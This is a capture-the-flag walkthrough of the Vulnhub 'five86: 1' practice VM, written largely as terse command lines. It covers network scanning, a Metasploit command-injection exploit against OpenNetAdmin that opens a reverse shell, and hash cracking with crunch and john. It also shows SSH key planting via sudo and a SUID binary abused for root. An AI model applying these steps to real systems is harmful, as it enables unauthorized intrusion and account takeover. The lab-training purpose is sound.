five86: 1 Walkthrough Vulnhub CTF
Today we are solving five86: 1 is created by DCAUC and This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. five86 1 walkthrough
Download here five86: 1
Network Scanning
our first step is to identify the target IP address we will initiate with netdiscover.
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netdiscover |
Nmap Aggressive scan. All port and services. and wee see target machine port 22 ssh, 80 http, 10000 Webmin httpd service is running
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nmap -A |
enumerating port 80 http service we open the IP address in the web browser
we see the /ona directory look like openNetAdmin service is running I go to about page and we see the openNetAdmin version.
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we go to exploit-db and search openNetAdmin v18.1.1 and I found a command injection exploit now I download the exploit our local system
adding exploit msfconsole copy our exploit Download directory to Metasploit directory
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cp /root/Downloads/47772.rb /usr/share/metasploit-framework/modules/exploits/ |
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msfconsole |
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use exploit/47772 |
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set rhosts |
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set lhost |
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run |
our session 1 is open and we got a reverse connection target machine
The shell it gave was not proper so to fix that we run the Python One-Liner. As this machine was loaded with the Python3, we need to use the Python3 variant of the One-Liner. for proper shell
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shell |
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python -c 'import pty;pty.spawn("/bin/bash")' |
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id |
ls -lsa command to check all hidden file and directory and I open .htpasswd file
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ls -lsa |
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cat .htpasswd |
Privilege Escalation
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cat hash |
Creating a wordlist using crunch and length is 10 and use target password character
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crunch 10 10 aefhrt >word.txt |
Try to crack the hash file with john using our custom wordlist
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john --wordlist=word.txt hash |
our hashes are crack now changing our shell www-data to user douglas and successfully login with douglas account.
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su douglas |
run sudo -l to check for commands that can run as sudo. It looks like dpkg can run as sudo.
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sudo -l |
Generating an ssh key for our second user
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ssh-keygen -b 2048 |
I copying this key target machine /tmp directory and changing name authorized_keys
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cp /home/douglas/.ssh/ /tmp/authorized_keys |
After Creating key now changing the permission this file and copy our second user jen /home/jen/.ssh directory
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cd /tmp |
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chmod 777 authorized_keys |
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sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/ |
Try to connecting ssh connection without any password and us successfully login with Jen user
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ssh jen@ |
After try many directory enumeration I found a mail massage
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cd /var/mail |
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ls |
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cat jen |
changing user Jen to the moss with the password found in the mail message
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su moss |
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find /home -type f -perm -u=s 2>/dev/null |
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cd /home/moss/.games/ |
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./upyourgame |
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cd /root |
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cat flag.txt |